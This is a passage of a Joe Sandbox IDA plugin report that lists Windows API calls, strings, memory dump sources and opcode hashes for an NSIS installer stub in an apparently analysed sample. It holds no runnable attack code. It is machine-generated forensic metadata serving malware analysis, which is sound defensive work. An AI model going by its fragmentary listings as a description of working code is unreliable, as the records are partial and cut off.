                                                            • Part of subcall function 004060C8: GetModuleHandleA.KERNEL32(?,?,?,00403179,00000009), ref: 004060DA
                                                            • Part of subcall function 004060C8: GetProcAddress.KERNEL32(00000000,?), ref: 004060F5
                                                          • OleUninitialize.OLE32(?), ref: 0040340C
                                                          • ExitProcess.KERNEL32 ref: 0040342D
                                                          • GetCurrentProcess.KERNEL32(00000028,?), ref: 0040354A
                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 00403551
                                                          • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403569
                                                          • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00403588
                                                          • ExitWindowsEx.USER32(00000002,80040002), ref: 004035AC
                                                          • ExitProcess.KERNEL32 ref: 004035CF
                                                            • Part of subcall function 00405525: MessageBoxIndirectA.USER32(00409218), ref: 00405580
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.3198119429.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000007.00000002.3198052124.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.3198133351.0000000000407000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.3198146602.0000000000409000.00000008.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.3198165131.0000000000449000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_Ultradolichocephaly.jbxd
                                                          Similarity
                                                          • API ID: Process$Exit$EnvironmentFileHandleModulePathTempTokenVariableWindowslstrcat$AddressAdjustCharCommandCurrentDeleteDirectoryErrorIndirectInfoInitializeLineLookupMessageModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrlen
                                                          • String ID: "$.tmp$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                          • API String ID: 3329125770-3048946811
                                                          • Opcode ID: 18141ac9e7fcba5b90f8b0ac50ebfc9b4084288e615748eb8764b98dad7c2969
                                                          • Instruction ID: 749ed98c63e487a66f460374afa67f5348490bcf6ac540fe4d7c6930d14d49f5
                                                          • Opcode Fuzzy Hash: 18141ac9e7fcba5b90f8b0ac50ebfc9b4084288e615748eb8764b98dad7c2969
                                                          • Instruction Fuzzy Hash: E1C105306086416AE7216F61AC4DA6F3EACEF46706F04457FF541BA1E3C77C9A058B2E
                                                          APIs
                                                          • GetDlgItem.USER32(?,000003F9), ref: 004048DD
                                                          • GetDlgItem.USER32(?,00000408), ref: 004048E8
                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 00404932
                                                          • LoadBitmapA.USER32(0000006E), ref: 00404945
                                                          • SetWindowLongA.USER32(?,000000FC,00404EBC), ref: 0040495E
                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404972
                                                          • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404984
                                                          • SendMessageA.USER32(?,00001109,00000002), ref: 0040499A
                                                          • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 004049A6
                                                          • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 004049B8
                                                          • DeleteObject.GDI32(00000000), ref: 004049BB
                                                          • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 004049E6
                                                          • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 004049F2
                                                          • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404A87
                                                          • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404AB2
                                                          • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404AC6
                                                          • GetWindowLongA.USER32(?,000000F0), ref: 00404AF5
                                                          • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404B03
                                                          • ShowWindow.USER32(?,00000005), ref: 00404B14
                                                          • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404C11
                                                          • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404C76
                                                          • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404C8B
                                                          • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404CAF
                                                          • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404CCF
                                                          • ImageList_Destroy.COMCTL32(?), ref: 00404CE4
                                                          • GlobalFree.KERNEL32(?), ref: 00404CF4
                                                          • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404D6D
                                                          • SendMessageA.USER32(?,00001102,?,?), ref: 00404E16
                                                          • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404E25
                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00404E45
                                                          • ShowWindow.USER32(?,00000000), ref: 00404E93
                                                          • GetDlgItem.USER32(?,000003FE), ref: 00404E9E
                                                          • ShowWindow.USER32(00000000), ref: 00404EA5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.3198119429.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000007.00000002.3198052124.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.3198133351.0000000000407000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.3198146602.0000000000409000.00000008.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.3198165131.0000000000449000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_Ultradolichocephaly.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                          • String ID: $M$N
                                                          • API String ID: 1638840714-813528018
                                                          • Opcode ID: a3d3ad99b0f8efa623893e6a1d4f65310e000fa748ae66744d23e893eb9c45fa
                                                          • Instruction ID: ee94c2e81ac7fcd3d2633371b1ae487f30220c2a0e0de663c2dd45f1c85c3c3c
                                                          • Opcode Fuzzy Hash: a3d3ad99b0f8efa623893e6a1d4f65310e000fa748ae66744d23e893eb9c45fa
                                                          • Instruction Fuzzy Hash: D70262B0A00209AFEB20DF55DC45AAE7BB5FB84315F14413AF610BA2E1C7799D51CF58
                                                          APIs
                                                          • DeleteFileA.KERNEL32(?,?,75923410,00435400,00000000), ref: 004055FA
                                                          • lstrcatA.KERNEL32(0042A870,\*.*,0042A870,?,?,75923410,00435400,00000000), ref: 00405642
                                                          • lstrcatA.KERNEL32(?,00409014,?,0042A870,?,?,75923410,00435400,00000000), ref: 00405663
                                                          • lstrlenA.KERNEL32(?,?,00409014,?,0042A870,?,?,75923410,00435400,00000000), ref: 00405669
                                                          • FindFirstFileA.KERNEL32(0042A870,?,?,?,00409014,?,0042A870,?,?,75923410,00435400,00000000), ref: 0040567A
                                                          • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405727
                                                          • FindClose.KERNEL32(00000000), ref: 00405738
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.3198119429.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000007.00000002.3198052124.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.3198133351.0000000000407000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.3198146602.0000000000409000.00000008.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.3198165131.0000000000449000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_Ultradolichocephaly.jbxd
                                                          Similarity
                                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                          • String ID: \*.*
                                                          • API String ID: 2035342205-1173974218
                                                          • Opcode ID: 76f0cf5bfb1f51320b672cd4c332f5cb7a228c538b92ebc2b22e9cd978c5504d
                                                          • Instruction ID: d14c28ea715dd5a13497ef66355ac6b33f8f035006b682f92d24d725560d25e8
                                                          • Opcode Fuzzy Hash: 76f0cf5bfb1f51320b672cd4c332f5cb7a228c538b92ebc2b22e9cd978c5504d
                                                          • Instruction Fuzzy Hash: 0D51CF30800A44AADF21AB258C85BBF7AB8DF92754F54447BF404761D2D73C8982EE6E
                                                          APIs
                                                          • GetDlgItem.USER32(?,00000403), ref: 004050E5
                                                          • GetDlgItem.USER32(?,000003EE), ref: 004050F4
                                                          • GetClientRect.USER32(?,?), ref: 00405131
                                                          • GetSystemMetrics.USER32(00000002), ref: 00405138
                                                          • SendMessageA.USER32(?,0000101B,00000000,?), ref: 00405159
                                                          • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 0040516A
                                                          • SendMessageA.USER32(?,00001001,00000000,?), ref: 0040517D
                                                          • SendMessageA.USER32(?,00001026,00000000,?), ref: 0040518B
                                                          • SendMessageA.USER32(?,00001024,00000000,?), ref: 0040519E
                                                          • ShowWindow.USER32(00000000,?,0000001B,?), ref: 004051C0
                                                          • ShowWindow.USER32(?,00000008), ref: 004051D4
                                                          • GetDlgItem.USER32(?,000003EC), ref: 004051F5
                                                          • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405205
                                                          • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 0040521E
                                                          • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 0040522A
                                                          • GetDlgItem.USER32(?,000003F8), ref: 00405103
                                                            • Part of subcall function 00403F49: SendMessageA.USER32(00000028,?,00000001,00403D7A), ref: 00403F57
                                                          • GetDlgItem.USER32(?,000003EC), ref: 00405246
                                                          • CreateThread.KERNEL32(00000000,00000000,Function_0000501A,00000000), ref: 00405254
                                                          • CloseHandle.KERNEL32(00000000), ref: 0040525B
                                                          • ShowWindow.USER32(00000000), ref: 0040527E
                                                          • ShowWindow.USER32(?,00000008), ref: 00405285
                                                          • ShowWindow.USER32(00000008), ref: 004052CB
                                                          • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052FF
                                                          • CreatePopupMenu.USER32 ref: 00405310
                                                          • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 00405325
                                                          • GetWindowRect.USER32(?,000000FF), ref: 00405345
                                                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040535E
                                                          • SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040539A
                                                          • OpenClipboard.USER32(00000000), ref: 004053AA
                                                          • EmptyClipboard.USER32 ref: 004053B0
                                                          • GlobalAlloc.KERNEL32(00000042,?), ref: 004053B9
                                                          • GlobalLock.KERNEL32(00000000), ref: 004053C3
                                                          • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004053D7
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 004053F0
                                                          • SetClipboardData.USER32(00000001,00000000), ref: 004053FB
                                                          • CloseClipboard.USER32 ref: 00405401
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.3198119429.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000007.00000002.3198052124.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.3198133351.0000000000407000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.3198146602.0000000000409000.00000008.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.3198165131.0000000000449000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_Ultradolichocephaly.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                          • String ID:
                                                          • API String ID: 590372296-0
                                                          • Opcode ID: 311fc79b2a61d49d532f234ec6369dceb9bfd60424ce1a676fe4c78957951ccc
                                                          • Instruction ID: a6ce54ef4cbaee69b9623da841507b5c48c0df4ae21fd636639bbbe11a9743ae
                                                          • Opcode Fuzzy Hash: 311fc79b2a61d49d532f234ec6369dceb9bfd60424ce1a676fe4c78957951ccc
                                                          • Instruction Fuzzy Hash: 8EA13871900208BFEB119FA0DD89AAE7F79FB08355F10407AFA01BA1A0C7755E51DF69
                                                          APIs
                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403A7D
                                                          • ShowWindow.USER32(?), ref: 00403A9A
                                                          • DestroyWindow.USER32 ref: 00403AAE
                                                          • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403ACA
                                                          • GetDlgItem.USER32(?,?), ref: 00403AEB
                                                          • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403AFF
                                                          • IsWindowEnabled.USER32(00000000), ref: 00403B06
                                                          • GetDlgItem.USER32(?,00000001), ref: 00403BB4
                                                          • GetDlgItem.USER32(?,00000002), ref: 00403BBE
                                                          • SetClassLongA.USER32(?,000000F2,?), ref: 00403BD8
                                                          • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403C29
                                                          • GetDlgItem.USER32(?,00000003), ref: 00403CCF
                                                          • ShowWindow.USER32(00000000,?), ref: 00403CF0
                                                          • EnableWindow.USER32(?,?), ref: 00403D02
                                                          • EnableWindow.USER32(?,?), ref: 00403D1D
                                                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403D33
                                                          • EnableMenuItem.USER32(00000000), ref: 00403D3A
                                                          • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403D52
                                                          • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403D65
                                                          • lstrlenA.KERNEL32(00429868,?,00429868,0042DC00), ref: 00403D8E
                                                          • SetWindowTextA.USER32(?,00429868), ref: 00403D9D
                                                          • ShowWindow.USER32(?,0000000A), ref: 00403ED1
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.3198119429.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000007.00000002.3198052124.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.3198133351.0000000000407000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.3198146602.0000000000409000.00000008.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.3198165131.0000000000449000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_Ultradolichocephaly.jbxd
                                                          Similarity
                                                          • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                          • String ID:
                                                          • API String ID: 184305955-0
                                                          • Opcode ID: 89e1168e402d04a6884629a41500819bc31e4f7db7bbfd7358c180d68350a674
                                                          • Instruction ID: 4996b7fab7fdeaebc033b1676f4cae353b3174fabf4a12f0715eb1af02f584c4
                                                          • Opcode Fuzzy Hash: 89e1168e402d04a6884629a41500819bc31e4f7db7bbfd7358c180d68350a674
                                                          • Instruction Fuzzy Hash: 74C1B131A04205ABDB216F62ED85E2B7EBCFB4570AF40053EF501B11E1C739A942DB6E
                                                          APIs
                                                          • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 004040E8
                                                          • GetDlgItem.USER32(00000000,000003E8), ref: 004040FC
                                                          • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 0040411A
                                                          • GetSysColor.USER32(?), ref: 0040412B
                                                          • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 0040413A
                                                          • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404149
                                                          • lstrlenA.KERNEL32(?), ref: 0040414C
                                                          • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 0040415B
                                                          • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404170
                                                          • GetDlgItem.USER32(?,0000040A), ref: 004041D2
                                                          • SendMessageA.USER32(00000000), ref: 004041D5
                                                          • GetDlgItem.USER32(?,000003E8), ref: 00404200
                                                          • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404240
                                                          • LoadCursorA.USER32(00000000,00007F02), ref: 0040424F
                                                          • SetCursor.USER32(00000000), ref: 00404258
                                                          • ShellExecuteA.SHELL32(0000070B,open,0042D3A0,00000000,00000000,00000001), ref: 0040426B
                                                          • LoadCursorA.USER32(00000000,00007F00), ref: 00404278
                                                          • SetCursor.USER32(00000000), ref: 0040427B
                                                          • SendMessageA.USER32(00000111,00000001,00000000), ref: 004042A7
                                                          • SendMessageA.USER32(00000010,00000000,00000000), ref: 004042BB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.3198119429.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000007.00000002.3198052124.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.3198133351.0000000000407000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.3198146602.0000000000409000.00000008.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.3198165131.0000000000449000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_Ultradolichocephaly.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                          • String ID: (@@$N$open
                                                          • API String ID: 3615053054-4158277975
                                                          • Opcode ID: 7868d9df4ae1d674ab0cf3f1043cffc922edae777938ca354114bc27cd0f8479
                                                          • Instruction ID: c92d02d703ef172067c6e48558b1c194508f37b8d1d7228abd04d5231d4a861f
                                                          • Opcode Fuzzy Hash: 7868d9df4ae1d674ab0cf3f1043cffc922edae777938ca354114bc27cd0f8479
                                                          • Instruction Fuzzy Hash: 5461D3B1A40209BFEB109F21DC45F6A7B68FB44755F10807AFB00BA2D1C7B8A951CB98
                                                          APIs
                                                            • Part of subcall function 004060C8: GetModuleHandleA.KERNEL32(?,?,?,00403179,00000009), ref: 004060DA
                                                            • Part of subcall function 004060C8: GetProcAddress.KERNEL32(00000000,?), ref: 004060F5
                                                          • lstrcatA.KERNEL32(00435000,00429868,80000001,Control Panel\Desktop\ResourceLocale,00000000,00429868,00000000,00000002,75923410,00435400,00434000,00000000), ref: 0040372A
                                                          • lstrlenA.KERNEL32(0042D3A0,?,?,?,0042D3A0,00000000,00434400,00435000,00429868,80000001,Control Panel\Desktop\ResourceLocale,00000000,00429868,00000000,00000002,75923410), ref: 0040379F
                                                          • lstrcmpiA.KERNEL32(?,.exe), ref: 004037B2
                                                          • GetFileAttributesA.KERNEL32(0042D3A0), ref: 004037BD
                                                          • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,00434400), ref: 00403806
                                                            • Part of subcall function 00405C8D: wsprintfA.USER32 ref: 00405C9A
                                                          • RegisterClassA.USER32(0042DBA0), ref: 00403843
                                                          • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0040385B
                                                          • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403890
                                                          • ShowWindow.USER32(00000005,00000000), ref: 004038C6
                                                          • GetClassInfoA.USER32(00000000,RichEdit20A,0042DBA0), ref: 004038F2
                                                          • GetClassInfoA.USER32(00000000,RichEdit,0042DBA0), ref: 004038FF
                                                          • RegisterClassA.USER32(0042DBA0), ref: 00403908
                                                          • DialogBoxParamA.USER32(?,00000000,00403A41,00000000), ref: 00403927
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.3198119429.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000007.00000002.3198052124.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.3198133351.0000000000407000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.3198146602.0000000000409000.00000008.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.3198165131.0000000000449000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_Ultradolichocephaly.jbxd
                                                          Similarity
                                                          • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                          • String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                          • API String ID: 1975747703-2904746566
                                                          • Opcode ID: 15a455c79fece2dcda9c86dfaf1125d35941ba458b98b68e8c70ea8c6fc28151
                                                          • Instruction ID: 60e5f6254d87716c4f77e59e0de616dae33e132719ef70849b8472436850552a
                                                          • Opcode Fuzzy Hash: 15a455c79fece2dcda9c86dfaf1125d35941ba458b98b68e8c70ea8c6fc28151
                                                          • Instruction Fuzzy Hash: 4161E6B07442006EE620BF269C85F373EACEB45749F50443FF945B62E2C67CAD429A2D
                                                          APIs
                                                          • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                          • BeginPaint.USER32(?,?), ref: 00401047
                                                          • GetClientRect.USER32(?,?), ref: 0040105B
                                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                          • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                          • DeleteObject.GDI32(?), ref: 004010ED
                                                          • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                          • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                          • SelectObject.GDI32(00000000,?), ref: 00401140
                                                          • DrawTextA.USER32(00000000,0042DC00,000000FF,00000010,00000820), ref: 00401156
                                                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                          • DeleteObject.GDI32(?), ref: 00401165
                                                          • EndPaint.USER32(?,?), ref: 0040116E
                                                          Similarity
                                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                          • String ID: F
                                                          • API String ID: 941294808-1304234792
                                                          • Opcode ID: 743dd018db8a108fdfb55826faff2fb237305abb1c3a72422579a1c27d61dc24
                                                          • Instruction ID: 9af9226455e7fa8211e54ab4aa6b8deb1f4adf461e7c9b231a43246ca388c9df
                                                          • Opcode Fuzzy Hash: 743dd018db8a108fdfb55826faff2fb237305abb1c3a72422579a1c27d61dc24
                                                          • Instruction Fuzzy Hash: F0419B71804249AFCB058FA5CD459AFBBB9FF44310F00812AF961AA1A0C738EA51DFA5
                                                          APIs
                                                          • lstrcpyA.KERNEL32(0042B5F8,NUL,?,00000000,?,00000000,00405C0B,?,?), ref: 00405A87
                                                          • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,00405C0B,?,?), ref: 00405AAB
                                                          • GetShortPathNameA.KERNEL32(?,0042B5F8,00000400), ref: 00405AB4
                                                            • Part of subcall function 00405907: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B64,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405917
                                                            • Part of subcall function 00405907: lstrlenA.KERNEL32(00000000,?,00000000,00405B64,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405949
                                                          • GetShortPathNameA.KERNEL32(0042B9F8,0042B9F8,00000400), ref: 00405AD1
                                                          • wsprintfA.USER32 ref: 00405AEF
                                                          • GetFileSize.KERNEL32(00000000,00000000,0042B9F8,C0000000,00000004,0042B9F8,?,?,?,?,?), ref: 00405B2A
                                                          • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405B39
                                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B71
                                                          • SetFilePointer.KERNEL32(004093B0,00000000,00000000,00000000,00000000,0042B1F8,00000000,-0000000A,004093B0,00000000,[Rename],00000000,00000000,00000000), ref: 00405BC7
                                                          • GlobalFree.KERNEL32(00000000), ref: 00405BD8
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405BDF
                                                            • Part of subcall function 004059A2: GetFileAttributesA.KERNEL32(00000003,00402CA6,00435C00,80000000,00000003), ref: 004059A6
                                                            • Part of subcall function 004059A2: CreateFileA.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 004059C8
                                                          Similarity
                                                          • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                          • String ID: %s=%s$NUL$[Rename]
                                                          • API String ID: 222337774-4148678300
                                                          • Opcode ID: 0c50eb09e583338ef7ecdda6ae2002cf09a3ce7e7e8240124cc9ac734fa8403c
                                                          • Instruction ID: 8a014ae25a2f57f4e7f496887e8afb480c0f68f452f449b39f33bde68a4ee9be
                                                          • Opcode Fuzzy Hash: 0c50eb09e583338ef7ecdda6ae2002cf09a3ce7e7e8240124cc9ac734fa8403c
                                                          • Instruction Fuzzy Hash: 5231F370604B19ABC2206B615D49F6B3A6CDF45758F14053AFE01F62D2DA7CB800CEAD
                                                          APIs
                                                          • GetDlgItem.USER32(?,000003FB), ref: 004043A1
                                                          • SetWindowTextA.USER32(00000000,?), ref: 004043CB
                                                          • SHBrowseForFolderA.SHELL32(?,00428C40,?), ref: 0040447C
                                                          • CoTaskMemFree.OLE32(00000000), ref: 00404487
                                                          • lstrcmpiA.KERNEL32(0042D3A0,00429868), ref: 004044B9
                                                          • lstrcatA.KERNEL32(?,0042D3A0), ref: 004044C5
                                                          • SetDlgItemTextA.USER32(?,000003FB,?), ref: 004044D7
                                                            • Part of subcall function 00405509: GetDlgItemTextA.USER32(?,?,00000400,0040450E), ref: 0040551C
                                                            • Part of subcall function 00405F9A: CharNextA.USER32(?,*?|<>/":,00000000,00434000,75923410,00435400,00000000,004030EA,00435400,00435400,004032FF), ref: 00405FF2
                                                            • Part of subcall function 00405F9A: CharNextA.USER32(?,?,?,00000000), ref: 00405FFF
                                                            • Part of subcall function 00405F9A: CharNextA.USER32(?,00434000,75923410,00435400,00000000,004030EA,00435400,00435400,004032FF), ref: 00406004
                                                            • Part of subcall function 00405F9A: CharPrevA.USER32(?,?,75923410,00435400,00000000,004030EA,00435400,00435400,004032FF), ref: 00406014
                                                          • GetDiskFreeSpaceA.KERNEL32(00428838,?,?,0000040F,?,00428838,00428838,?,00000001,00428838,?,?,000003FB,?), ref: 00404595
                                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004045B0
                                                            • Part of subcall function 00404709: lstrlenA.KERNEL32(00429868,00429868,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404624,000000DF,00000000,00000400,?), ref: 004047A7
                                                            • Part of subcall function 00404709: wsprintfA.USER32 ref: 004047AF
                                                            • Part of subcall function 00404709: SetDlgItemTextA.USER32(?,00429868), ref: 004047C2
                                                          Similarity
                                                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                          • String ID: A
                                                          • API String ID: 2624150263-3554254475
                                                          • Opcode ID: 57310190734ee8f346be83e1cb7f981a0d8ab0a60c9531f780aaa692ea2f78ba
                                                          • Instruction ID: ab5132907fc5b2f665edfad9f17b3ca32a66d27d09768481e079f0ca797b6646
                                                          • Opcode Fuzzy Hash: 57310190734ee8f346be83e1cb7f981a0d8ab0a60c9531f780aaa692ea2f78ba
                                                          • Instruction Fuzzy Hash: 07A194B1900209ABDB11AFA2CC45AAF77B8EF85314F10843BF601B62D1D77C8941CB69
                                                          APIs
                                                          • GetVersion.KERNEL32(?,00429048,00000000,00404F80,00429048,00000000), ref: 00405E02
                                                          • GetSystemDirectoryA.KERNEL32(0042D3A0,00000400), ref: 00405E7D
                                                          • GetWindowsDirectoryA.KERNEL32(0042D3A0,00000400), ref: 00405E90
                                                          • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 00405ECC
                                                          • SHGetPathFromIDListA.SHELL32(?,0042D3A0), ref: 00405EDA
                                                          • CoTaskMemFree.OLE32(?), ref: 00405EE5
                                                          • lstrcatA.KERNEL32(0042D3A0,\Microsoft\Internet Explorer\Quick Launch), ref: 00405F07
                                                          • lstrlenA.KERNEL32(0042D3A0,?,00429048,00000000,00404F80,00429048,00000000), ref: 00405F59
                                                          Strings
                                                          • \Microsoft\Internet Explorer\Quick Launch, xrefs: 00405F01
                                                          • Software\Microsoft\Windows\CurrentVersion, xrefs: 00405E4C
                                                          Similarity
                                                          • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                          • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                          • API String ID: 900638850-730719616
                                                          • Opcode ID: 4b4f6d4be9a7cdf5a80b7e66d5c1c973ac9c95f8c70165c0c062674a5d01c598
                                                          • Instruction ID: d2d5afd6cadd1c558da9919d7f7a0e519c97b97f5b6dedc277a7ce0050389877
                                                          • Opcode Fuzzy Hash: 4b4f6d4be9a7cdf5a80b7e66d5c1c973ac9c95f8c70165c0c062674a5d01c598
                                                          • Instruction Fuzzy Hash: 99610671A04916ABEF216B24DC85BBF7BA8DB15314F10813BE941BA2D1D33C4942DF9E
                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 00402C77
